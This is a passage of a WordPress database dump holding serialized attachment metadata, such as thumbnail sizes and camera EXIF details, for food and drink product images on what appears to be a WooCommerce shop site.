:620;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:43:\"green-yellow-flavoured-water-NW-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:43:\"green-yellow-flavoured-water-NW-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:43:\"green-yellow-flavoured-water-NW-620x550.jpg\";s:5:\"width\";i:620;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:43:\"green-yellow-flavoured-water-NW-550x930.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:930;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:43:\"green-yellow-flavoured-water-NW-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:43:\"green-yellow-flavoured-water-NW-600x900.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:900;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:43:\"green-yellow-flavoured-water-NW-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"7.1\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1431252075\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:17:\"0.033333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(12473,5010,'_wp_attached_file','2020/04/orange-banana-ready-1300-x-1945.jpg'),(12474,5010,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1300;s:6:\"height\";i:1943;s:4:\"file\";s:43:\"2020/04/orange-banana-ready-1300-x-1945.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:43:\"orange-banana-ready-1300-x-1945-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:43:\"orange-banana-ready-1300-x-1945-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:43:\"orange-banana-ready-1300-x-1945-600x897.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:897;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:43:\"orange-banana-ready-1300-x-1945-201x300.jpg\";s:5:\"width\";i:201;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:44:\"orange-banana-ready-1300-x-1945-685x1024.jpg\";s:5:\"width\";i:685;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:43:\"orange-banana-ready-1300-x-1945-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:44:\"orange-banana-ready-1300-x-1945-768x1148.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1148;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:43:\"orange-banana-ready-1300-x-1945-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:43:\"orange-banana-ready-1300-x-1945-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:45:\"orange-banana-ready-1300-x-1945-1028x1536.jpg\";s:5:\"width\";i:1028;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:43:\"orange-banana-ready-1300-x-1945-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:44:\"orange-banana-ready-1300-x-1945-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:44:\"orange-banana-ready-1300-x-1945-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:45:\"orange-banana-ready-1300-x-1945-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:43:\"orange-banana-ready-1300-x-1945-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:43:\"orange-banana-ready-1300-x-1945-600x897.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:897;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:43:\"orange-banana-ready-1300-x-1945-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"1.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:14:\"Canon EOS 200D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1552032228\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.002\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(12475,5011,'_wp_attached_file','2020/04/pesto-for-new-web.jpg'),(12476,5011,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:420;s:6:\"height\";i:630;s:4:\"file\";s:29:\"2020/04/pesto-for-new-web.jpg\";s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"pesto-for-new-web-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"pesto-for-new-web-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"pesto-for-new-web-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"pesto-for-new-web-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:29:\"pesto-for-new-web-420x300.jpg\";s:5:\"width\";i:420;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:29:\"pesto-for-new-web-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:29:\"pesto-for-new-web-420x550.jpg\";s:5:\"width\";i:420;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:29:\"pesto-for-new-web-420x550.jpg\";s:5:\"width\";i:420;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:29:\"pesto-for-new-web-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"pesto-for-new-web-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:14:\"Canon EOS 200D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1552205941\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:5:\"0.005\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(12477,5012,'_wp_attached_file','2020/04/soup-1943-x-1300.jpg'),(12478,5012,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1299;s:6:\"height\";i:1943;s:4:\"file\";s:28:\"2020/04/soup-1943-x-1300.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:28:\"soup-1943-x-1300-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"soup-1943-x-1300-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:28:\"soup-1943-x-1300-600x897.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:897;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"soup-1943-x-1300-201x300.jpg\";s:5:\"width\";i:201;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:29:\"soup-1943-x-1300-685x1024.jpg\";s:5:\"width\";i:685;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"soup-1943-x-1300-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"soup-1943-x-1300-768x1149.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1149;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:28:\"soup-1943-x-1300-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:28:\"soup-1943-x-1300-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:30:\"soup-1943-x-1300-1027x1536.jpg\";s:5:\"width\";i:1027;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:28:\"soup-1943-x-1300-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:29:\"soup-1943-x-1300-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:29:\"soup-1943-x-1300-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:30:\"soup-1943-x-1300-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:28:\"soup-1943-x-1300-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:28:\"soup-1943-x-1300-600x897.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:897;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:28:\"soup-1943-x-1300-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:14:\"Canon EOS 200D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1492830929\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.025\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(12479,5013,'_wp_attached_file','2020/04/recipe-website.jpg'),(12480,5013,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1300;s:6:\"height\";i:1943;s:4:\"file\";s:26:\"2020/04/recipe-website.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:26:\"recipe-website-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"recipe-website-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:26:\"recipe-website-600x897.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:897;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"recipe-website-201x300.jpg\";s:5:\"width\";i:201;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"recipe-website-685x1024.jpg\";s:5:\"width\";i:685;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"recipe-website-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"recipe-website-768x1148.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1148;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:26:\"recipe-website-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:26:\"recipe-website-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:28:\"recipe-website-1028x1536.jpg\";s:5:\"width\";i:1028;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:26:\"recipe-website-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:27:\"recipe-website-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:27:\"recipe-website-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:28:\"recipe-website-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:26:\"recipe-website-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:26:\"recipe-website-600x897.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:897;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"recipe-website-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:14:\"Canon EOS 200D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1552205941\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:5:\"0.005\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(12481,5014,'_wp_attached_file','2020/04/orange-tea-1943-x-1300.jpg'),(12482,5014,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1300;s:6:\"height\";i:1943;s:4:\"file\";s:34:\"2020/04/orange-tea-1943-x-1300.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:34:\"orange-tea-1943-x-1300-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:34:\"orange-tea-1943-x-1300-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:34:\"orange-tea-1943-x-1300-600x897.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:897;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"orange-tea-1943-x-1300-201x300.jpg\";s:5:\"width\";i:201;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:35:\"orange-tea-1943-x-1300-685x1024.jpg\";s:5:\"width\";i:685;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"orange-tea-1943-x-1300-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"orange-tea-1943-x-1300-768x1148.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1148;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:34:\"orange-tea-1943-x-1300-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:34:\"orange-tea-1943-x-1300-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:36:\"orange-tea-1943-x-1300-1028x1536.jpg\";s:5:\"width\";i:1028;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:34:\"orange-tea-1943-x-1300-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:35:\"orange-tea-1943-x-1300-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:35:\"orange-tea-1943-x-1300-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:36:\"orange-tea-1943-x-1300-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:34:\"orange-tea-1943-x-1300-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:34:\"orange-tea-1943-x-1300-600x897.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:897;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:34:\"orange-tea-1943-x-1300-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"1.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1480761825\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:6:\"0.0008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(12483,5015,'_wp_attached_file','2020/04/drink-gren-1943x1300-1.jpg'),(12484,5015,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1300;s:6:\"height\";i:1943;s:4:\"file\";s:34:\"2020/04/drink-gren-1943x1300-1.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:34:\"drink-gren-1943x1300-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:34:\"drink-gren-1943x1300-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:34:\"drink-gren-1943x1300-1-600x897.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:897;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"drink-gren-1943x1300-1-201x300.jpg\";s:5:\"width\";i:201;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:35:\"drink-gren-1943x1300-1-685x1024.jpg\";s:5:\"width\";i:685;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"drink-gren-1943x1300-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"drink-gren-1943x1300-1-768x1148.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1148;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:34:\"drink-gren-1943x1300-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:34:\"drink-gren-1943x1300-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:36:\"drink-gren-1943x1300-1-1028x1536.jpg\";s:5:\"width\";i:1028;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:34:\"drink-gren-1943x1300-1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:35:\"drink-gren-1943x1300-1-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:35:\"drink-gren-1943x1300-1-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:36:\"drink-gren-1943x1300-1-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:34:\"drink-gren-1943x1300-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:34:\"drink-gren-1943x1300-1-600x897.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:897;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:34:\"drink-gren-1943x1300-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"7.1\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1431252075\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:17:\"0.033333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(12485,5016,'_wp_attached_file','2020/04/Icecream-pineapplefw.jpg'),(12486,5016,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1300;s:6:\"height\";i:1943;s:4:\"file\";s:32:\"2020/04/Icecream-pineapplefw.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:32:\"Icecream-pineapplefw-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"Icecream-pineapplefw-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:32:\"Icecream-pineapplefw-600x897.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:897;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"Icecream-pineapplefw-201x300.jpg\";s:5:\"width\";i:201;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:33:\"Icecream-pineapplefw-685x1024.jpg\";s:5:\"width\";i:685;s:6